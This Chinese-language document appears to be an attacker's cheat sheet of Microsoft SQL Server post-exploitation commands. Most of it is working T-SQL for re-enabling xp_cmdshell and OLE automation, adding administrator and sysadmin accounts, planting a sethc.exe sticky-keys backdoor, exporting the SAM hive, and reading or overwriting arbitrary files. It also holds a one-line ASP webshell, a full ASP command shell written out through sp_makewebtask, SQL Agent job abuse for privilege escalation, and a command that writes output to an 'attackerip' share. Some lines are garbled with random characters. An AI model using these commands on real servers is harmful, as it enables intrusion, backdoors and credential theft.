1. 未能找到存储过程 'master..xp_cmdshell'。EXEC master.dbo.sp_addextendedproc 后用下面的三种方法;在注入点上执行时加个空格和分号。
恢复方法:查询分析器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕
2. 无法装载 DLL xpsql70.dll 或该 DLL 所引用的某一 DLL。原因 126(找不到指定模块。)
恢复方法:查询分析器连接后,
第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按 F5 键,命令执行完毕
3. 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因:127(找不到指定的程序。)
恢复方法:查询分析器连接后,
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然后按 F5 键,命令执行完毕
4. 终极方法。
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分析器连接后,
2000 Server 系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
XP 或 2003 Server 系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
五个 SHIFT
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
xp_cmdshell执行命令另一种方法
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
判断扩展存储过程是否存在
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK
上传 xplog70.dll 恢复 xp_cmdshell 的语句:
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
否则上传 xplog70.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用 jet.oledb 执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
恢复过程 sp_addextendedproc 如下:
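-- Re-creates the system procedure sp_addextendedproc (the header date 1996/08/30 20:13
-- is carried over from the original text).
-- @functname: (owner.)name of the extended procedure to register.
-- @dllname:   name of the DLL that is supposed to export that function.
-- Returns 0 on success, 1 when called inside an open transaction.
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
-- Registration is refused inside a user transaction: error 15002 is raised
-- and the procedure returns 1.
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
-- The actual registration. @dllname is passed through unchanged, so whatever
-- DLL name or path the caller supplies is what gets registered for @functname.
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO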
导出管理员密码文件
sa 默认应该可以读 SAM 键。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
用 administrator 登陆。
用完机器后
reg import c:\test.reg
根本不用克隆。
找到对应的sid.
恢复所有存储过程
use master
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
建立读文件的存储过程
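-- Loads a text file into a temp table with BULK INSERT and returns every row.
-- @filename: path of the file to read. It is spliced verbatim into a dynamic
--            BULK INSERT statement; the only quoting is the surrounding double
--            quotes and the value is not validated.
-- NOTE(review): BULK INSERT runs inside the server process, so the file is
-- presumably read in the service account's own security context - confirm.
-- Detection angle: each call shows up as an EXEC of a dynamic BULK INSERT on
-- #tempfile, which is what server-side auditing of BULK INSERT / EXEC(string)
-- will surface.
Create proc sp_readTextFile @filename sysname
as
begin
    set nocount on
    Create table #tempfile (line varchar(8000))
    exec ('bulk insert #tempfile from "' + @filename + '"')
    select * from #tempfile
    drop table #tempfile
End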
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件
查看登录用户
Select * from sysxlogins
把文件内容读取到表中:
BULK INSERT tmp from "c:\test.txt"
delete from 表名 清理表里的内容
create table b_test(fn nvarchar(4000));建一个表,字段为fn
加 sa 用户
exec master.dbo.sp_addlogin user,pass;
exec master.dbo.sp_addsrvrolemember user,sysadmin
读文件代码
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
写文件代码:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
添加 lake2 shell
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
sp_dropextendedproc xp_lake2
EXEC xp_lake2 'net user'
得到硬盘文件信息
--参数说明:目录名,目录深度,是否显示文件
execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1
读 Serv-U 配置信息
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
通过xp_regwrite写SHIFT后门
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' ' 备份一个小马就可以了
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
SQL Server 2005 下开启 xp_cmdshell 的办法
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
SQL 2005 开启 'OPENROWSET' 支持的方法:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
SQL 2005 开启 'sp_oacreate' 支持的方法:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
以下方法不知道能不能成功,暂且留下研究哈:
4)
use msdb; --这儿不要是 master 哟
exec sp_add_job @job_name= czy82 ;
exec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
exec sp_start_job @job_name= czy82 ;
利用 MSSQL 的作业处理也是可以执行命令的;而且如果上面的 subsystem 参数是 TSQL,后面就可以执行 T-SQL 语句了。
使用这几个存储过程时,第一,在 @server_name 要指定你的 SQL 服务器名;
第二,系统的 SQLSERVERAGENT 服务必须打开(默认是没打开的,气人了吧)
net start SQLSERVERAGENT
对于这个东东还有一个地方不同,就是 public 也可以执行。这儿也是有系统洞洞的,看下面的:
USE msdb
EXEC sp_add_job @job_name = GetSystemOnSQL ,
@enabled = 1,
@description = This will give a low privileged user access to
xp_cmdshell ,
@delete_level = 1,
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
@step_name = Exec my sql ,
@subsystem = TSQL ,
@command = exec master..xp_execresultset N select exec
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
@server_name = 你的 SQL 服务器名
EXEC sp_start_job @job_name = GetSystemOnSQL
不要怀疑上面的代码,我是测试成功了的!这儿要注意 xp_execresultset,就是因为它,才让我们可以以 public 执行 xp_cmdshell。
5) 关于 Microsoft SQL Agent Jobs 任意文件可删除/覆盖漏洞(public 用户也可以)
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
USE msdb
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
@enabled = 1,
@description = This will create a file called c:\sqlafc123.txt ,
@delete_level = 1
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
@step_name = SQLAFC ,
@subsystem = TSQL ,
@command = select hello, this file was created by the SQL Agent. ,
@output_file_name = c:\sqlafc123.txt
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
@server_name = SERVER_NAME
EXEC sp_start_job @job_name = ArbitraryFilecreate
如果 subsystem 选的是 TSQL,在生成的文件的头部有如下内容:
4 v4 n" X; n0 I8 O+ D! l+ N??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19. G1 g. b3 C; ^6 [; L
----------------------------------------------
hello, this file was created by the SQL Agent.

(1 ?????)
所以我建议,要生成文件最好 subsystem 选 CMDEXEC;如果利用得好,我们可以写一个带添加管理员命令的 vbs 文件到启动目录!
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
关于 sp_MScopyscriptfile,看下面的例子:
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command= dir c:\ > "\\attackerip\share\dir.txt"
select @scripfile= c:\autoexec.bat > nul" | @command | rd "
exec sp_MScopyscriptfile @scripfile ,
这两个东东都还在测试哟
让MSSQL的public用户得到一个本机的web shell
' x, R/ j+ F2 A( O% Z7 Z+ tsp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,! k3 q; \* T2 m
--@query= select <img src=vbscript:msgbox(now())>
) W4 B" Z% ?- Q# }1 ]' L* y; [& `--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
% i' S, W# s& z8 V@query= select
6 g, @; l& |: w<%On Error Resume Next 5 o! E, J6 ~1 X7 Q: N, h& m
Set oscript = Server.createObject("wscript.SHELL") ( c# ~; ^4 P/ ~1 u
Set oscriptNet = Server.createObject("wscript.NETWORK") ) z# i+ x( X3 a2 e
Set oFileSys = Server.createObject("scripting.FileSystemObject")
0 `) `6 M7 H- Y0 } KszCMD = Request.Form(".CMD")
! x ?8 G+ G# r4 l1 W. T3 NIf (szCMD <>"")Then
6 r t$ H& M9 z3 |, p# [szTempFile = "C:\" & oFileSys.GetTempName() \' u+ w1 I- k) b' J, c& Q
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
" @8 Q4 X4 c7 r0 O9 p" U" fSet oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) - Y. \/ y8 Z. K) X; o/ r5 f
End If %> " ^' _3 P* v9 v
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
) T! e) _0 n& z4 n: s, |+ G<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
' T( J, {* Z$ K0 ?</FORM>< RE>
- W8 P; I( [: \3 x9 ~<% If (IsObject(oFile))Then
( w( k+ y2 \. h w! y& _1 r7 |# dOn Error Resume Next 3 K) g, e& C8 d3 M/ T
Response.Write Server.HTMLEncode(oFile.ReadAll)
# b" p/ i1 K' I+ zoFile.Close
o: K( g; j1 i) m! KCall oFileSys.deleteFile(szTempFile, True) 9 ~, G2 u3 ^3 h( u6 W+ z0 J+ Q
End If%> * t% X! y B1 R! I, S! d
</BODY></HTML> ! D" e$ q$ I, `) V